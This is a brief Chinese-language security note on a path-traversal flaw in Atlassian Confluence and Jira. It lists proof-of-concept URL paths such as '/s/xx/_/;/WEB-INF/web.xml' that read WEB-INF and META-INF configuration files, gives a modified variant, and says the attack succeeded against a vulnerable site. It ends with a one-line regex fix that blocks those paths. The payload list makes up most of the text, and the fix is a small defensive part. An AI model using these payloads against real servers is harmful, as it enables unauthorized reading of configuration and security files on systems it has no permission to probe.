1、Confluence系统都存在漏洞,漏洞poc如下:
/s/xx/_/;/WEB-INF/web.xml
/s/xx/_/;/WEB-INF/decorators.xml
/s/xx/_/;/WEB-INF/classes/seraph-config.xml
/s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/xx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
稍加改造/s/everything/_/;anythingulike/WEB-INF/web.xml2、挑一个漏洞站点进行复现,漏洞复现成功。
3、漏洞修复
对正则进行了删改。
Pattern PATHS_DENIED = Pattern.compile("[^a-zA-Z0-9]((?i)(WEB-INF)|(META-INF))[^a-zA-Z0-9]")